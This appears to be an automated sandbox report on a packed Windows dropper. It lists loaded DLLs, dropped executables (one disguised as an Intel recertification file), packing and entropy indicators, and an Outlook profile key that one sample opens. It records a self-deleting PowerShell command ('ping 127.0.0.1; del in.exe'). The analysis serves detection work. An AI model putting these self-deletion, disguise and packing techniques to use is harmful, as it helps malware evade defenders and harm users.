Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Section loaded: sfc_os.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: file.exe

Static file information: File size 3047936 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: file.exe

Static PE information: Raw size of tddfmghq is bigger than: 0x100000 < 0x2b6800

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W;tddfmghq:EW;zxizpfjk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tddfmghq:EW;zxizpfjk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.f30000.0.unpack :EW;.rsrc:W;.idata :W;tddfmghq:EW;zxizpfjk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tddfmghq:EW;zxizpfjk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 4.2.skotes.exe.f30000.0.unpack :EW;.rsrc:W;.idata :W;tddfmghq:EW;zxizpfjk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tddfmghq:EW;zxizpfjk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Unpacked PE file: 46.2.d5cd5e4aa8.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ewodcgyw:EW;mohodnpu:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Unpacked PE file: 48.2.9434b989db.exe.f20000.0.unpack :EW;.rsrc:W;.idata :W;lccfmtjw:EW;cjdwjaeg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lccfmtjw:EW;cjdwjaeg:EW;.taggant:EW;

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 20_2_009B66A8 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,

20_2_009B66A8

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 7z.dll.16.dr	Static PE information: real checksum: 0x0 should be: 0x1a2c6b
Source: Intel_PTT_EK_Recertification.exe.29.dr	Static PE information: real checksum: 0x0 should be: 0x1c320c
Source: 9434b989db.exe.14.dr	Static PE information: real checksum: 0x2c8893 should be: 0x2c3e4f
Source: random[1].exe0.14.dr	Static PE information: real checksum: 0x44d80a should be: 0x44ed54
Source: ea17d0b77a.exe.14.dr	Static PE information: real checksum: 0x1cff82 should be: 0x1cd17b
Source: random[1].exe2.14.dr	Static PE information: real checksum: 0x1cff82 should be: 0x1cd17b
Source: 352def4414.exe.14.dr	Static PE information: real checksum: 0x44d80a should be: 0x44ed54
Source: random[1].exe1.14.dr	Static PE information: real checksum: 0x1e4ae2 should be: 0x1f2d4f
Source: 7z.exe.16.dr	Static PE information: real checksum: 0x0 should be: 0x7b29e
Source: file.exe	Static PE information: real checksum: 0x2f0b23 should be: 0x2f207a
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x2f0b23 should be: 0x2f207a
Source: d5cd5e4aa8.exe.14.dr	Static PE information: real checksum: 0x1e4ae2 should be: 0x1f2d4f
Source: random[2].exe.14.dr	Static PE information: real checksum: 0x2c8893 should be: 0x2c3e4f
Source: in.exe.27.dr	Static PE information: real checksum: 0x0 should be: 0x1c320c

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: tddfmghq
Source: file.exe	Static PE information: section name: zxizpfjk
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: tddfmghq
Source: skotes.exe.0.dr	Static PE information: section name: zxizpfjk
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe0.14.dr	Static PE information: section name:
Source: random[1].exe0.14.dr	Static PE information: section name: .idata
Source: random[1].exe0.14.dr	Static PE information: section name:
Source: random[1].exe0.14.dr	Static PE information: section name: lbajxhwa
Source: random[1].exe0.14.dr	Static PE information: section name: ribahoty
Source: random[1].exe0.14.dr	Static PE information: section name: .taggant
Source: 352def4414.exe.14.dr	Static PE information: section name:
Source: 352def4414.exe.14.dr	Static PE information: section name: .idata
Source: 352def4414.exe.14.dr	Static PE information: section name:
Source: 352def4414.exe.14.dr	Static PE information: section name: lbajxhwa
Source: 352def4414.exe.14.dr	Static PE information: section name: ribahoty
Source: 352def4414.exe.14.dr	Static PE information: section name: .taggant
Source: random[1].exe1.14.dr	Static PE information: section name:
Source: random[1].exe1.14.dr	Static PE information: section name: .idata
Source: random[1].exe1.14.dr	Static PE information: section name:
Source: random[1].exe1.14.dr	Static PE information: section name: ewodcgyw
Source: random[1].exe1.14.dr	Static PE information: section name: mohodnpu
Source: random[1].exe1.14.dr	Static PE information: section name: .taggant
Source: d5cd5e4aa8.exe.14.dr	Static PE information: section name:
Source: d5cd5e4aa8.exe.14.dr	Static PE information: section name: .idata
Source: d5cd5e4aa8.exe.14.dr	Static PE information: section name:
Source: d5cd5e4aa8.exe.14.dr	Static PE information: section name: ewodcgyw
Source: d5cd5e4aa8.exe.14.dr	Static PE information: section name: mohodnpu
Source: d5cd5e4aa8.exe.14.dr	Static PE information: section name: .taggant
Source: random[1].exe2.14.dr	Static PE information: section name:
Source: random[1].exe2.14.dr	Static PE information: section name: .idata
Source: random[1].exe2.14.dr	Static PE information: section name:
Source: random[1].exe2.14.dr	Static PE information: section name: vznsjynp
Source: random[1].exe2.14.dr	Static PE information: section name: aooxnxiu
Source: random[1].exe2.14.dr	Static PE information: section name: .taggant
Source: ea17d0b77a.exe.14.dr	Static PE information: section name:
Source: ea17d0b77a.exe.14.dr	Static PE information: section name: .idata
Source: ea17d0b77a.exe.14.dr	Static PE information: section name:
Source: ea17d0b77a.exe.14.dr	Static PE information: section name: vznsjynp
Source: ea17d0b77a.exe.14.dr	Static PE information: section name: aooxnxiu
Source: ea17d0b77a.exe.14.dr	Static PE information: section name: .taggant
Source: random[2].exe.14.dr	Static PE information: section name:
Source: random[2].exe.14.dr	Static PE information: section name: .idata
Source: random[2].exe.14.dr	Static PE information: section name: lccfmtjw
Source: random[2].exe.14.dr	Static PE information: section name: cjdwjaeg
Source: random[2].exe.14.dr	Static PE information: section name: .taggant
Source: 9434b989db.exe.14.dr	Static PE information: section name:
Source: 9434b989db.exe.14.dr	Static PE information: section name: .idata
Source: 9434b989db.exe.14.dr	Static PE information: section name: lccfmtjw
Source: 9434b989db.exe.14.dr	Static PE information: section name: cjdwjaeg
Source: 9434b989db.exe.14.dr	Static PE information: section name: .taggant
Source: in.exe.27.dr	Static PE information: section name: UPX2
Source: Intel_PTT_EK_Recertification.exe.29.dr	Static PE information: section name: UPX2

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3D91C push ecx; ret	0_2_00B3D92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B31359 push es; ret	0_2_00B3135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00F4D91C push ecx; ret	3_2_00F4D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00F4D91C push ecx; ret	4_2_00F4D92F
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_0099676A push rcx; ret	20_2_0099676B

Source: file.exe	Static PE information: section name: entropy: 7.9825535221264685
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.9825535221264685
Source: random[1].exe0.14.dr	Static PE information: section name: lbajxhwa entropy: 7.955742518108575
Source: 352def4414.exe.14.dr	Static PE information: section name: lbajxhwa entropy: 7.955742518108575
Source: random[1].exe1.14.dr	Static PE information: section name: ewodcgyw entropy: 7.948285822322563
Source: d5cd5e4aa8.exe.14.dr	Static PE information: section name: ewodcgyw entropy: 7.948285822322563
Source: random[1].exe2.14.dr	Static PE information: section name: entropy: 7.966180915180425
Source: random[1].exe2.14.dr	Static PE information: section name: vznsjynp entropy: 7.952847512751214
Source: ea17d0b77a.exe.14.dr	Static PE information: section name: entropy: 7.966180915180425
Source: ea17d0b77a.exe.14.dr	Static PE information: section name: vznsjynp entropy: 7.952847512751214

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	Jump to dropped file
